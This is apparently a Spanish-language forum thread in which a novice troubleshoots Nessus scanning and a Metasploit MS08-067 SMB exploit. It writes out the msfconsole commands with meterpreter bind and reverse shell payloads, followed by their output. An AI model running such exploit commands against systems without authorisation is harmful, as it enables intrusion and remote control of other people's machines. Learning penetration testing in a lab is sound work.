Mensajes

hola a todos
he seguido investigando y leyendo muchos tutoriales,etc  y  soy un mar de dudas
perdonar si digo muchas burradas...
escaneo con nessus, y me fijo en las vulnerabilidades que me da, sobre todo en el puerto 445.
voy a la zona de ports/protocols  y miro las vulnerabilidades del puerto 445,  y me dice que son 11.
creo q las ordena de mayor a menor riesgo  (  low  y high )
me fijo en la que pone high, y me pone  PLUGIN ID: 42411  y PLUGIN NAME: microsoft windows SMB shares unprivileged access.
ahora mi problema es saber como utilizar el metasploit con esa vulnerabilidad
suelo hacer:
./msfconsole

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

y aqui viene el problema que siempre me pone que el exploit fue completado pero me pone algo  como q la  ip   o el host  was  unreachable  o algo asi, me da ese fallo.
se debe a q no estoy utilizando el exploit adecuado a esa vulnerabilidad?¿
muchas gracias y perdonar por el rollo que os he metido
un saludo

] Started reverse handler on 192.168.1.33:4444

• Automatically detecting the target...
  
• Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown
  
• Could not determine the exact language pack
  
• Exploit completed, but no session was created.
  msf exploit(ms08_067_netapi) >
  
  
  creo q ya he avanzado bastante :D  aunq estoy muy perdido aun...
  segun me han dicho exploto bien  pero no se porque razon  no creo una sesion...
  pero segui el tutorial ese  y consegui esto.
  como lo puedo solucionar¿?¿ 
  utilice el   set PAYLOAD windows/shell/reverse_tcp
  si utilizo otros  puede darme mejores resultados?¿?¡
  otra cosa , haciendo el escaner con nessus  me dio 14 vulnerabilidades   entre ellas el puerto  445  q es la q intente hacer,  pero si queiro probar otras  como se q utilizar en metasploit¿?¿   MEDIENTA  LA   ID¿?¿?¡     algun sitio q de informacion de esto¿?¡
  mil gracias de nuevo

Dudo que exista un tutorial de eso. Pero intentad Googlear un poco 

lo intento creeme  :D:D   pero no veo la luz al final del tunel.
he visto un video en youtube  pero no se si me servira de mucho.
en modo terminal se puede tb manejar el nessus¿?¿'   
lo digo porque por ahi  quizas si haya algun sitio donde pongan algun comando  para ahcer el scan...
muchas gracias

bien  he conseguido entrar, lo malo es q ahora no se donde darle  para poder seguir el tutorial de la pagina de dragon jar 
conoces de algun sitio donde haya algun tutorial de el nessus  a traves de web¿?¿
gracias por toda la ayuda q me estas dando tio...

[https]

Lo encontre es... https://localhost:8834. Recordad conectate por https a tu propio pc (localhost o 127.0.0.1) en el puerto 8834, que es donde esta corriendo la interfaz de Nessus.

joder  yo no se donde encontrais las cosas  :D:D llevo 2 horas buscando (bueno no tantas :D ) loo pruebo y te comento

[Browser]

Con Browser, quiero decir, que se utiliza en una interfaz WEB. No recuerdo como es para ingresar al Scanner, pero es https://localhost:puerto. Lo que no recuerdo en este momento es el PORT... 

sera la 1241  q es la tipica q utiliza¡?¿
probare y te comento

q es eso de q se usa por el browser¿?¿?
es por comandos  en terminal o algo asi¿?¿
donde puedo buscar informacion  o si tienes un tutorial tan bueno como el q estaba siguiendo
muchas gracais ded nuevo shellroot

la version de nessus q he instalado es:
Nessus-4.2.0-ubuntu810_i386.deb

y el nessus client:

NessusClient-4.0.2-ubuntu810_i386

seguramente este ahi el problema  no¿?¿'  ahora...  como lo soluciono¿?¿  :D

ah  debe de ser  en vez de poner una version mayor  una mas antigua para q funcione  o algo asi no¿?¡  downgraded    pero no se q comando poner o como hacerlo
gracias de nuevo

perdon, creia q eras tu.
con respecto a:

Cita de: https://discussions.nessus.org/message/2642
I had actually downgraded to Version 4.0.0 already to resolve the issue, but I'm sure that would fix my problem. Thanks for pointing that out.


he intentado mirar q es o a q hace referencia, pero no se que hacer, debe de ser de actualizar algo  o no se...   pero sinceramente  no tengo ni idea de que hacer ahora para solucionarlo
muchas gracias